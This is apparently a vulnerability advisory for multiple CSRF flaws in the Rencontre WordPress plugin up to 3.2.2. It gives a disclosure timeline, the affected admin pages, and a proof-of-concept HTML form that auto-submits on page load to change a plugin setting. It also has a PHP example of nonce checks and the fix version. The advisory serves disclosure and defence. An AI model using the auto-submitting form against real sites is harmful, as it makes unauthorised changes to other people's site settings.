Rencontre <= 3.2.2 - Multiple CSRF



Description
The plugin is affected by multiple CSRF issues, allowing arbitrary changes to the plugin's settings.

November 3rd, 2019 - WordPress Plugin Team Notified
November 5th, 2019 - WP Plugins Team acknowledged the issue
December 2nd, 2019 - v3.2.2 released; none of the CSRF issues were fixed, as nonces were only added to the AJAX actions
December 8th, 2019 - WP Plugins Team notified again
December 10th, 2019 - Plugin closed for review
December 11th, 2019 - v3.2.3 Released, fixing the issues
December 22nd - Plugin re-opened

Proof of Concept
Affected Pages:
/wp-admin/admin.php?page=rencontre.php
/wp-admin/admin.php?page=rencontre.php&renctab=log
/wp-admin/admin.php?page=rencontre.php&renctab=dis
/wp-admin/admin.php?page=rencontre.php&renctab=mel
/wp-admin/admin.php?page=rencmembers
/wp-admin/admin.php?page=rencjail
/wp-admin/admin.php?page=rencprofile (Update Member Profile, Add/Remove Language)
/wp-admin/admin.php?page=renccountry (Add/Remove Language)
/wp-admin/admin.php?page=renccountry&renctab=cle
/wp-admin/admin.php?page=renccustom
/wp-admin/admin.php?page=renccustom&renctab=wor
/wp-admin/admin.php?page=renccustom&renctab=sea
/wp-admin/admin.php?page=renccustom&renctab=tem

For example, the CSRF attack below changes the "Number of days in jail (deleted account)" setting to 7:

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://[WP]/wp-admin/admin.php?page=rencontre.php" method="POST">
      <input type="hidden" name="prison" value="7" />
    </form>
  </body>
</html>
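
The form above succeeds because the settings handlers act on a POST that carries no per-user token. As an added example (not the Rencontre plugin's code and not the 3.2.3 patch), the sketch below shows a WordPress admin settings page that verifies a nonce before saving the `prison` field; the plugin header, menu slug, nonce action and option name are hypothetical.

```php
<?php
/*
 * Plugin Name: Example nonce-protected settings page
 * Added illustration with hypothetical names; not the Rencontre plugin's code.
 */

const EXAMPLE_NONCE_ACTION = 'example_save_settings'; // hypothetical nonce action

add_action('admin_menu', function () {
    add_menu_page('Example', 'Example', 'manage_options',
                  'example-settings', 'example_settings_page');
});

function example_settings_page() {
    // Authorisation check: a nonce proves intent, not privilege.
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions.');
    }

    // Change state only on POST, and only after the nonce verifies.
    // check_admin_referer() ends the request when the _wpnonce field is
    // missing or invalid, which is the case for a cross-site auto-submitted form.
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['prison'])) {
        check_admin_referer(EXAMPLE_NONCE_ACTION);
        // Hypothetical option name; absint() keeps the value a non-negative integer.
        update_option('example_prison_days', absint(wp_unslash($_POST['prison'])));
        echo '<div class="updated"><p>Settings saved.</p></div>';
    }

    $days = absint(get_option('example_prison_days', 0));
    ?>
    <div class="wrap">
      <form method="post">
        <?php wp_nonce_field(EXAMPLE_NONCE_ACTION); // hidden _wpnonce + _wp_http_referer ?>
        <label>Number of days in jail (deleted account)
          <input type="number" name="prison" min="0"
                 value="<?php echo esc_attr($days); ?>" />
        </label>
        <?php submit_button(); ?>
      </form>
    </div>
    <?php
}
```

Every state-changing form and link on the affected pages needs the same pairing of `wp_nonce_field()` (or `wp_nonce_url()` for links) with a server-side check; adding nonces to AJAX actions alone leaves regular form posts unprotected.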

Affects Plugin

fixed in version 3.2.3

References

URL https://plugins.trac.wordpress.org/changeset?new=2215566%40rencontre&old=2209198%40rencontre

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Verified No
WPVDB ID 9980

Timeline

Publicly Published 2019-12-22
Added 2019-12-22
Last Updated 2019-12-22
